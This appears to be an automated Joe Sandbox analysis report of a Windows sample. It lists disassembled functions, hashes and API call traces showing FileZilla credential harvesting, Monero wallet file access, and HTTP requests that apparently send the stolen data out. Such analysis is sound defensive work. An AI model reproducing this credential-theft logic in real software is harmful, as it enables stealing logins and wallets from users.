                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e1af6ee6562652bd35dae2d9e5d89bb5ec4babaf7405b473c7cbae5ebb467f3
                                        • Instruction ID: 33d1a28d95bb46deeaf1f379d12d912a7bfa9c7585d58133c99ad437c41f199c
                                        • Opcode Fuzzy Hash: 6e1af6ee6562652bd35dae2d9e5d89bb5ec4babaf7405b473c7cbae5ebb467f3
                                        • Instruction Fuzzy Hash: 3C41D2F3E087049FF3146E69DC8976BB7D6EB94310F0B453DDAC893680E93859058686
                                        Function 009E6799 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction ID: 2624b384d01ecfbfd03e40148cbc9ea3b83e59674d1a58c2070efc83fef09f4d
                                        • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                        • Instruction Fuzzy Hash: DE512C62E09BD585C7068B7644502EEBFB25FE6210F1E82DEC4981F383C3759689D3E5
                                        Function 009B7588 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                        • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                        • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                        Function 00989AA0 Relevance: .0, Instructions: 15COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                        Function 009803B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00988F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988F9B
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 0097A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                          • Part of subcall function 0097A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                          • Part of subcall function 0097A110: LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                          • Part of subcall function 0097A110: ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                          • Part of subcall function 0097A110: LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                          • Part of subcall function 0097A110: CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • GetProcessHeap.KERNEL32(00000000,000F423F,00990DBF,00990DBE,00990DBB,00990DBA), ref: 009804C2
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009804C9
                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 009804E5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009804F3
                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0098052F
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 0098053D
                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00980579
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 00980587
                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 009805C3
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009805D5
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 00980662
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 0098067A
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 00980692
                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009806AA
                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 009806C2
                                        • lstrcat.KERNEL32(?,profile: null), ref: 009806D1
                                        • lstrcat.KERNEL32(?,url: ), ref: 009806E0
                                        • lstrcat.KERNEL32(?,00000000), ref: 009806F3
                                        • lstrcat.KERNEL32(?,00991770), ref: 00980702
                                        • lstrcat.KERNEL32(?,00000000), ref: 00980715
                                        • lstrcat.KERNEL32(?,00991774), ref: 00980724
                                        • lstrcat.KERNEL32(?,login: ), ref: 00980733
                                        • lstrcat.KERNEL32(?,00000000), ref: 00980746
                                        • lstrcat.KERNEL32(?,00991780), ref: 00980755
                                        • lstrcat.KERNEL32(?,password: ), ref: 00980764
                                        • lstrcat.KERNEL32(?,00000000), ref: 00980777
                                        • lstrcat.KERNEL32(?,00991790), ref: 00980786
                                        • lstrcat.KERNEL32(?,00991794), ref: 00980795
                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00990DB7), ref: 009807EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                        • API String ID: 1942843190-555421843
                                        • Opcode ID: 0e04f4695f47aa499d5b3715de49ebcb6c517c7ca0ca082a10616fc0ea2a50b3
                                        • Instruction ID: ef3b1fa8ba5b0b52d75621cddf23a2d25ed7d07e6fc6d82f97dcdd0925bab355
                                        • Opcode Fuzzy Hash: 0e04f4695f47aa499d5b3715de49ebcb6c517c7ca0ca082a10616fc0ea2a50b3
                                        • Instruction Fuzzy Hash: CDD13C75900209ABDB04FBE4DD96FEE7339BF95300F408559F106B6291EF78AA48CB61
                                        Function 009759B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00975A48
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00975A63
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00975BE3
                                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0181FD30,00000000,?,0181EC20,00000000,?,00991B4C), ref: 00975EC1
                                        • lstrlen.KERNEL32(00000000), ref: 00975ED2
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00975EE3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00975EEA
                                        • lstrlen.KERNEL32(00000000), ref: 00975EFF
                                        • lstrlen.KERNEL32(00000000), ref: 00975F28
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00975F41
                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00975F6B
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00975F7F
                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00975F9C
                                        • InternetCloseHandle.WININET(00000000), ref: 00976000
                                        • InternetCloseHandle.WININET(00000000), ref: 0097600D
                                        • HttpOpenRequestA.WININET(00000000,0181FB90,?,0181F008,00000000,00000000,00400100,00000000), ref: 00975C48
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00976017
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 874700897-2180234286
                                        • Opcode ID: 772d17015878b1c5069b563d669ce2dfebb34c406088d9aeb353ad8a8a097f08
                                        • Instruction ID: 588749f3141f11bbc25543ca5d96d967e2d38edc456553f26b4a3a705f8c3aea
                                        • Opcode Fuzzy Hash: 772d17015878b1c5069b563d669ce2dfebb34c406088d9aeb353ad8a8a097f08
                                        • Instruction Fuzzy Hash: 1D121271920118ABDB15FBA0DCA5FEEB379BF94700F00459AF10672191EF786A49CF61
                                        Function 0097CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0097D083
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0097D1C7
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0097D1CE
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D308
                                        • lstrcat.KERNEL32(?,00991570), ref: 0097D317
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D32A
                                        • lstrcat.KERNEL32(?,00991574), ref: 0097D339
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D34C
                                        • lstrcat.KERNEL32(?,00991578), ref: 0097D35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D36E
                                        • lstrcat.KERNEL32(?,0099157C), ref: 0097D37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D390
                                        • lstrcat.KERNEL32(?,00991580), ref: 0097D39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D3B2
                                        • lstrcat.KERNEL32(?,00991584), ref: 0097D3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 0097D3D4
                                        • lstrcat.KERNEL32(?,00991588), ref: 0097D3E3
                                          • Part of subcall function 0098AB30: lstrlen.KERNEL32(00974F55,?,?,00974F55,00990DDF), ref: 0098AB3B
                                          • Part of subcall function 0098AB30: lstrcpy.KERNEL32(00990DDF,00000000), ref: 0098AB95
                                        • lstrlen.KERNEL32(?), ref: 0097D42A
                                        • lstrlen.KERNEL32(?), ref: 0097D439
                                          • Part of subcall function 0098AD80: StrCmpCA.SHLWAPI(00000000,00991568,0097D2A2,00991568,00000000), ref: 0098AD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 0097D4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: d89be5cf04df5eb0193c7b7f70895fcb17219de350dd7a7d6a7e1bc5c558c9a5
                                        • Instruction ID: 30f6aaa0d50f47ecb806cea9a1227e54f5e28ac2c56f99f91d1326b803fdae64
                                        • Opcode Fuzzy Hash: d89be5cf04df5eb0193c7b7f70895fcb17219de350dd7a7d6a7e1bc5c558c9a5
                                        • Instruction Fuzzy Hash: 2AE12275910108ABDB04FBA4DD96FEE7379BF94301F10455AF106B61A1DF39AE08CB62
                                        Function 0097CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0181DE38,00000000,?,00991544,00000000,?,?), ref: 0097CB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0097CB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0097CB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0097CBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0097CBD9
                                        • StrStrA.SHLWAPI(?,0181DE50,00990B56), ref: 0097CBF7
                                        • StrStrA.SHLWAPI(00000000,0181DF10), ref: 0097CC1E
                                        • StrStrA.SHLWAPI(?,0181DFC8,00000000,?,00991550,00000000,?,00000000,00000000,?,018189E8,00000000,?,0099154C,00000000,?), ref: 0097CDA2
                                        • StrStrA.SHLWAPI(00000000,0181E188), ref: 0097CDB9
                                          • Part of subcall function 0097C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0097C971
